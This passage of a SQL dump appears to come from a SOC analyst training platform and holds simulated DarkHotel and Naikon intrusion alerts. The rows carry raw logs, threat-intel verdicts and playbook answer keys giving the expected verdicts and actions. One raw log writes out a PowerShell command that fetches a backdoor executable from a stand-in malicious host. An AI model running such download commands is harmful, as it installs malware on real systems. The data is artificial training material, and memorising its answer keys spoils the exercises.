group.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known DarkHotel trojan.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"trojan_hotel.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Analysis Sandbox\",\"verdict\":\"malicious\",\"details\":\"Filename is commonly used in DarkHotel campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"guest_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Database\",\"verdict\":\"internal\",\"details\":\"Default username for hotel guests.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(472, 'Unsigned Software Update Detected', 'high', 'Endpoint security alerts', 'An advanced alert was triggered when a target device attempted to execute a software update lacking a valid signature. This indicates a potential execution of a malicious payload disguised as a legitimate software update.', 'Execution', 'T1204.002 - User Execution: Malicious File', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:27:49Z\",\"device_id\":\"WIN-192168011\",\"user\":\"jdoe\",\"filename\":\"update_v1.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_signature_status\":\"unsigned\",\"source_ip\":\"192.168.0.11\",\"destination_ip\":\"45.76.12.34\",\"process_id\":4528,\"execution_path\":\"C:\\\\Program Files\\\\Update\\\\update_v1.exe\",\"alert_message\":\"Unsigned software update executed on endpoint\",\"external_reputation\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 14/60 antivirus engines\"}}', '2026-01-05 03:04:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.12.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Command and Control servers.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 14/60 antivirus engines\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"update_v1.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee active in the HR 
department.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(473, 'Tapaoux Malware Persistence Mechanism', 'high', 'File integrity monitoring', 'The Tapaoux malware employs advanced techniques to maintain persistence, ensuring continued access to the target device despite potential reboots or shutdowns.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:48:00Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"target_ip\":\"10.0.15.21\",\"user\":\"compromised_user\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\tapaoux.dll\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"Added to startup\",\"registry_key_modified\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\TapaouxService\"}', '2026-01-05 03:04:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Tapaoux malware operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.21\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised device.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\tapaoux.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Tapaoux malware DLL used for persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup Service\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Tapaoux malware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User 
Directory\",\"verdict\":\"suspicious\",\"details\":\"User account suspected to be compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.082Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_ip\\\":\\\"10.0.15.21\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tapaoux.dll\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"Added to startup\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\TapaouxService\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.082Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_ip\\\":\\\"10.0.15.21\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tapaoux.dll\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"Added to startup\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\TapaouxService\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.082Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_ip\\\":\\\"10.0.15.21\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tapaoux.dll\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"Added to startup\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\TapaouxService\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.082Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_ip\\\":\\\"10.0.15.21\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tapaoux.dll\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"Added to startup\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\TapaouxService\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.082Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_ip\\\":\\\"10.0.15.21\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tapaoux.dll\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"Added to startup\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\TapaouxService\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(474, 'Unauthorized Credential Access Attempt', 'high', 'Authentication logs', 'DarkHotel APT group attempts to harvest credentials from a compromised device, aiming to move laterally and access additional systems within the network. The attack was detected through unusual login attempts from an external IP address using a compromised internal account.', 'Lateral Movement', 'T1078.001 - Valid Accounts: Default Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"event_id\":\"4625\",\"logon_type\":\"3\",\"user\":\"compromised_user\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"status\":\"FAILED\",\"failure_reason\":\"Unknown user name or bad password\",\"target_machine\":\"WIN-DC01\",\"hash\":\"e4d909c290d0fb1ca068ffaddf22cbd0\",\"filename\":\"darkhotel_tool.exe\"}', '2026-01-05 03:04:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with DarkHotel APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual access patterns detected.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e4d909c290d0fb1ca068ffaddf22cbd0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Known hash for DarkHotel credential harvesting tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(475, 'Exfiltration of Sensitive Data', 'critical', 'Data loss prevention alerts', 'The final phase of the attack involves exfiltrating sensitive information from the executive\'s device to an external server controlled by DarkHotel, completing their malicious objectives.', 'Exfiltration', 'T1048.003 - Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:45.123Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.0.25\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"8080\",\"protocol\":\"HTTP\",\"username\":\"jdoe_exec\",\"filename\":\"Executive_Report_Q3_2023.pdf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"alert_source\":\"DLP\",\"threat_actor\":\"DarkHotel\",\"external_server\":\"malicious-server.example.com\"}', '2026-01-05 03:04:49', '2026-02-16 18:20:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the source device.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with DarkHotel APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Executive_Report_Q3_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document containing executive data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious files used by 
DarkHotel.\"}},{\"id\":\"artifact_5\",\"type\":\"domain\",\"value\":\"malicious-server.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"domain_reputation\",\"verdict\":\"malicious\",\"details\":\"Domain known to be used by DarkHotel for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.084Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45.123Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"8080\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"username\\\":\\\"jdoe_exec\\\",\\\"filename\\\":\\\"Executive_Report_Q3_2023.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert_source\\\":\\\"DLP\\\",\\\"threat_actor\\\":\\\"DarkHotel\\\",\\\"external_server\\\":\\\"malicious-server.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.084Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45.123Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"8080\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"username\\\":\\\"jdoe_exec\\\",\\\"filename\\\":\\\"Executive_Report_Q3_2023.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert_source\\\":\\\"DLP\\\",\\\"threat_actor\\\":\\\"DarkHotel\\\",\\\"external_server\\\":\\\"malicious-server.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.084Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45.123Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"8080\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"username\\\":\\\"jdoe_exec\\\",\\\"filename\\\":\\\"Executive_Report_Q3_2023.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert_source\\\":\\\"DLP\\\",\\\"threat_actor\\\":\\\"DarkHotel\\\",\\\"external_server\\\":\\\"malicious-server.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.084Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45.123Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"8080\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"username\\\":\\\"jdoe_exec\\\",\\\"filename\\\":\\\"Executive_Report_Q3_2023.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert_source\\\":\\\"DLP\\\",\\\"threat_actor\\\":\\\"DarkHotel\\\",\\\"external_server\\\":\\\"malicious-server.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.084Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45.123Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"8080\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"username\\\":\\\"jdoe_exec\\\",\\\"filename\\\":\\\"Executive_Report_Q3_2023.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert_source\\\":\\\"DLP\\\",\\\"threat_actor\\\":\\\"DarkHotel\\\",\\\"external_server\\\":\\\"malicious-server.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(476, 'Suspicious Email with Malicious RTF Attachment Detected', 'medium', 'Email Security Gateway', 'A spear-phishing email was detected targeting a regional government employee. The email contained a RoyalRoad RTF file, commonly used by Naikon APT to exploit vulnerabilities in Microsoft Word for initial access.', 'Phishing', 'T1566.001', 1, 'Closed', 1, '{\"timestamp\":\"2023-10-24T09:15:27Z\",\"email_id\":\"b7f9a85d-083f-4d6b-9c6f-f22a3fc1e9b1\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.2.15\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"employee@regionalgov.org\",\"subject\":\"Urgent: Review Attached Document\",\"attachment\":{\"filename\":\"important_document.rtf\",\"hash\":\"a4b9c78cb6f1a2b3d4e5f6a7b8c9d0e1\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\"}', '2026-01-05 03:08:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feeds\",\"verdict\":\"malicious\",\"details\":\"IP associated with Naikon APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of recipient.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain used by APT groups.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"employee@regionalgov.org\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate email of a regional government 
employee.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"a4b9c78cb6f1a2b3d4e5f6a7b8c9d0e1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash associated with RoyalRoad exploit documents.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"important_document.rtf\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used in spear-phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email with Malicious RTF Attachment Detected\",\"date\":\"2026-02-01T20:32:19.085Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(477, 'Execution of Malicious Payload via RoyalRoad Exploit', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the RTF document, the RoyalRoad exploit triggers, executing a script that downloads the Aria-body backdoor onto the target\'s system.', 'Malware Execution', 'T1203: Exploitation for Client Execution', 1, 'resolved', 34, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"event_id\":\"EDR-456789\",\"source_ip\":\"203.0.113.15\",\"destination_ip\":\"10.0.0.25\",\"user\":\"jdoe\",\"file_name\":\"malicious_document.rtf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_executed\":\"powershell.exe -Command Invoke-WebRequest -Uri http://malicious-site.com/aria-body.exe -OutFile C:\\\\Temp\\\\aria-body.exe\",\"malware_hash\":\"4a8a08f09d37b73795649038408b5f33\",\"action_taken\":\"Quarantine\"}', '2026-01-05 03:08:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_document.rtf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"File involved in RoyalRoad exploit delivery.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to malicious RTF documents.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"4a8a08f09d37b73795649038408b5f33\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash 
associated with Aria-body malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
